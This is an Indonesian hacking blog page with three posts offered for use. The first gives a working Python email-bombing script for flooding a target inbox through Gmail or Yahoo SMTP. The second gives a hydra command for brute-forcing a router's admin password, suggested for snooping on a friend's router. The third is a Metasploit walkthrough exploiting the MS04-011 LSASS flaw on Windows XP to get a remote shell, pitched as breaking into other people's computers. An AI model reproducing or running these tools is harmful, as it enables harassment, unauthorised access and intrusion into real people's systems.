Posts Subscribe to This BlogComments

Follow Us

New Articles

1 2 3 4 5

Selasa, 03 Juli 2012

Flooad Email

Email sahabat pernah penuh dengan email yang tidak jelas datang dari mana, kamaren browsing diinternet dan pergi kesebuah blog milik abi71, disana dipaparkan script yang ditulis dengan python untuk mengirimkann email dalam jumlah yang banyak. berikut script dan cara menggunakannya :

1. Copy code dibawah dan simpan dengan nama emailbomb.py
#!/usr/bin/python
#pybombmail.py by aBi71
#This code for education purpose only.
#Use it at your own risk !!!

import os
import smtplib
import getpass
import sys


server = raw_input ('Server Mail: ')
user = raw_input('Username: ')
passwd = getpass.getpass('Password: ')


to = raw_input('\nTo: ')
#subject = raw_input('Subject: ')
body = raw_input('Message: ')
total = input('Number of send: ')

if server == 'gmail':
    smtp_server = 'smtp.gmail.com'
    port = 587
elif server == 'yahoo':
    smtp_server = 'smtp.mail.yahoo.com'
    port = 25
else:
    print 'Applies only to gmail and yahoo.'
    sys.exit()

print ''

try:
    server = smtplib.SMTP(smtp_server,port)
    server.ehlo()
    if smtp_server == "smtp.gmail.com":
            server.starttls()
    server.login(user,passwd)
    for i in range(1, total+1):
        subject = os.urandom(9)
        msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body
        server.sendmail(user,to,msg)
        print "\rTotal emails sent: %i" % i
        sys.stdout.flush()
    server.quit()
    print '\n Done !!!'
except KeyboardInterrupt:
    print '[-] Canceled'
    sys.exit()
except smtplib.SMTPAuthenticationError:
    print '\n[!] The username or password you entered is incorrect.'
    sys.exit()
2. Setting permission untuk dapat dieksekusi dan jalankan .
root@hack-code:~# chmod +x emailbomb.py
root@Hack-code:~# ./emailbomb.py
Selamat Mencoba...

Sumber Tour
Read More...

Crack Password Router

Jika suatu saat sahabat lupa pada password router, mungkin karena terlalu banyak password yang harus dihapal atau bisa juga karena faktor "U" (Umur). Cracking Password router bisa menjadi salah satu pilihan yang pas ketimbang harus mereset ulang router tersebut, dan siapa tau juga nanti lagi internetan pake router temen iseng pengen tau apa sih password routernya. Disini saya menggunakan hydra sebuah aplikasi yang memang dikhususkan untuk melakukan cracking password

hydra -l admin -p LIST_PASSWORD -e ns -t 10 -f -s -vV IP_ROUTER http-get /

root@coder-hack:~# hydra -l admin -p /pentest/passwords/wordlists/darkc0de.lst -e ns -t 10 -f -s -vV 192.168.0.1 http-get /
root@coder-hack:~# firefox http://admin:admin@192.168.0.1

Read More...

Cara Menyusup Ke Komputer Orang Lain

Dari judulnya Cara Menyusup Ke Komputer Orang Lain brarti bukan menyusup ke komputer tetangga aja, tetapi juga munyusup ke komputer si DOI, haghaghag... ( lagi batuk berdahak gan, ketawanya jadi serem)

Okelah gan, lansung saja ke TKP :

Disini kita pake metasploit framework-3.1 ( tanya ama mbah ku, mbah gogel )

1. Jalanin programnya...
2. truz..teken tombol CTRL+O bwat masuk ke konsolnya..
3. maka akan muncul konsol spt ini

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ msf v3.1-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux

msf >

4. liat smua exploit yg ada...(tuk iseng doank
msf > show exploits

5. load modul exploit, qta gunain exploit lsass spt cara diatas

msf > use windows/smb/ms04_011_lsass

6. Tentukan sistem operasi target... misal target menggunakan XP

maka targetnya spt berikut

msf exploit(ms04_011_lsass) > set target 2

target => 2

7. Tampilin payloadnya apa aja yg ada..

msf exploit(ms04_011_lsass) > show payloads

8. karena qta mo msk k konsol, qta plh payload generic/shell_bind_tcp

msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp

payload => generic/shell_bind_tcp

9. Udah ntuh tentuin IP si target...misal ip si target 192.168.113.14

msf exploit(ms04_011_lsass) > set RHOST 192.168.113.14
RHOST => 192.168.113.14

10. Udah dech...tinggal jalanin perintah exploit...

msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444)
[*] The DCERPC service did not reply to our request

lihat di sana ada tulisan Command shell session 3 opened...ini menandakan qta sudah berhasil msk...dan shell qta di simpan di session 3.

11. Selanjutnya qta tampilin...isi session qta

msf exploit(ms04_011_lsass) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444

12. Udah itu...kita masuk ke session 3 tersebut, untuk masuk ke konsol....

msf exploit(ms04_011_lsass) > sessions -i 3

[*] Starting interaction with 3...

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

13. Hehe...dah masuk tuch

pergunakan dengan baik dan benar

untuk tutor lebih jelas liat aja di sini nich Tutorial

terus buat download mesin nya disini aja ya Download


catatan: metasploit3 cuman bisa heck windows xp n ade-adenya....
enjoyJ
Read More...

New Template

New Tutorial

 

Behind This Blog

Reader Community

Newsletter